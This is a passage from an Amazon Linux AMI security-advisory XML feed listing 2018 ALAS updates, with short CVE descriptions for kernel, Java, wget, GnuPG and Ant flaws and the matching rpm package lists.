An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
CVE-2018-1120:
By mmap()ing a FUSE-backed file onto a process&#039;s memory containing command line arguments (or environment strings), an attacker can cause utilities from psutils or procps (such as ps, w) or any other program which makes a read() call to the /proc/&lt;pid&gt;/cmdline (or /proc/&lt;pid&gt;/environ) files to block indefinitely (denial of service) or for some controlled time (as a synchronization primitive for other attacks).
1575472:
CVE-2018-1120 kernel: fuse-backed file mmap-ed onto process cmdline arguments causes denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1120" title="" id="CVE-2018-1120" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3693" title="" id="CVE-2018-3693" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.47" release="56.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.47-56.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.47-56.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.47" release="56.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.47-56.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1039</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1039: important priority package update for java-1.8.0-openjdk</title><issued date="2018-06-08 18:34:00" /><updated date="2018-06-11 21:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3639:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load &amp; Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.
1566890:
CVE-2018-3639 hw: cpu: speculative store bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3639" title="" id="CVE-2018-3639" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.171-8.b10.38.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-8.b10.38.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.171-8.b10.38.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.171" release="8.b10.38.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.171-8.b10.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1040</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1040: medium priority package update for wget</title><issued date="2018-06-08 18:35:00" /><updated date="2018-06-11 21:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-0494:
A cookie injection flaw was found in wget. An attacker can create a malicious website which, when accessed, overrides cookies belonging to arbitrary domains.
1575634:
CVE-2018-0494 wget: Cookie injection allows malicious website to write arbitrary cookie entries into cookie jar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0494" title="" id="CVE-2018-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget-debuginfo" version="1.18" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-4.29.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-4.29.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-4.29.amzn1.i686.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-4.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1044</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1044: medium priority package update for kernel</title><issued date="2018-06-27 21:53:00" /><updated date="2018-07-24 21:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12232:
A NULL pointer dereference issue was found in the Linux kernel. If the close() and fchownat() system calls share a socket file descriptor as an argument, then the two calls can race and trigger a NULL pointer dereference leading to a system crash and a denial of service.
1590215:
CVE-2018-12232 kernel: NULL pointer dereference if close and fchownat system calls share a socket file descriptor
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12232" title="" id="CVE-2018-12232" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.51-60.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.51-60.38.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.51" release="60.38.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.51-60.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1045</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1045: important priority package update for gnupg gnupg2</title><issued date="2018-06-27 21:57:00" /><updated date="2025-04-23 21:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9234:
GnuPG 2.2.4 and 2.2.5 does not enforce a configuration in which key certification requires an offline master Certify key, which results in apparently valid certifications that occurred only with access to a signing subkey.
CVE-2018-12020:
A data validation flaw was found in the way gnupg processes file names during decryption and signature validation. An attacker may be able to inject messages into gnupg verbose message logging which may have the potential to bypass the integrity of signature authentication mechanisms and could have other unintended consequences if applications take action(s) based on parsed verbose gnupg output.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12020" title="" id="CVE-2018-12020" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9234" title="" id="CVE-2018-9234" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg" version="1.4.19" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.19-1.29.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.19-1.29.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.19" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.19-1.29.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.19-1.29.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1046</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1046: medium priority package update for kernel</title><issued date="2018-07-23 20:51:00" /><updated date="2018-07-24 21:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11412:
The fs/ext4/inline.c:ext4_read_inline_data() function in the Linux kernel performs a memcpy with an untrusted length value in certain circumstances involving a crafted filesystem that stores the system.data extended attribute value in a dedicated inode. The unbound copy can cause memory corruption or possible privilege escalation.
1582358:
CVE-2018-11412 kernel: out-of-bounds memcpy in fs/ext4/inline.c:ext4_read_inline_data() with crafted ext4 image
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11412" title="" id="CVE-2018-11412" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.55-62.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1047</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1047: medium priority package update for ant</title><issued date="2018-07-23 20:56:00" /><updated date="2018-07-24 21:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10886:
It was discovered that Ant&#039;s unzip and untar targets permit the extraction of files outside the target directory. A crafted zip or tar file submitted to an Ant build could create or overwrite arbitrary files with the privileges of the user running Ant.
1584407:
CVE-2018-10886 ant: arbitrary file write vulnerability and arbitrary code execution using a specially crafted zip file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10886" title="" id="CVE-2018-10886" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ant-javadoc" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-javadoc-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-commons-net" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-commons-net-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-commons-logging" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-commons-logging-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-antlr" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-antlr-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-oro" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-oro-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-resolver" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-resolver-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-scripts" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-scripts-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-testutil" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-testutil-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-swing" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-swing-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-manual" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-manual-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-jdepend" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-jdepend-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-bsf" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-bsf-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-xalan2" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-xalan2-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-jmf" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-jmf-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-javamail" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-javamail-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-log4j" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-log4j-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-bcel" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-bcel-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-jsch" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-jsch-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-junit" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-junit-1.8.3-1.14.amzn1.noarch.rpm</filename></package><package name="ant-apache-regexp" version="1.8.3" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ant-apache-regexp-1.8.3-1.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1048</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1048: low priority package update for kernel</title><issued date="2018-08-04 23:47:00" /><updated date="2018-08-06 18:27:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-13094:
An issue was discovered in the XFS filesystem in fs/xfs/libxfs/xfs_attr_leaf.c in the Linux kernel. A NULL pointer dereference may occur for a corrupted xfs image after xfs_da_shrink_inode() is called with a NULL bp. This can lead to a system crash and a denial of service.
1597771:
CVE-2018-13094 kernel: NULL pointer dereference in xfs_da_shrink_inode function
CVE-2018-13093:
An issue was discovered in the XFS filesystem in fs/xfs/xfs_icache.c in the Linux kernel. There is a NULL pointer dereference leading to a system panic in lookup_slow() on a NULL inode-&gt;i_ops pointer when doing pathwalks on a corrupted xfs image. This occurs because of a lack of proper validation that cached inodes are free during an allocation.
1597766:
CVE-2018-13093 kernel: NULL pointer dereference in lookup_slow function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13093" title="" id="CVE-2018-13093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13094" title="" id="CVE-2018-13094" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.59" release="64.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.59-64.43.amzn1.x86_64.rpm</filename></package><package 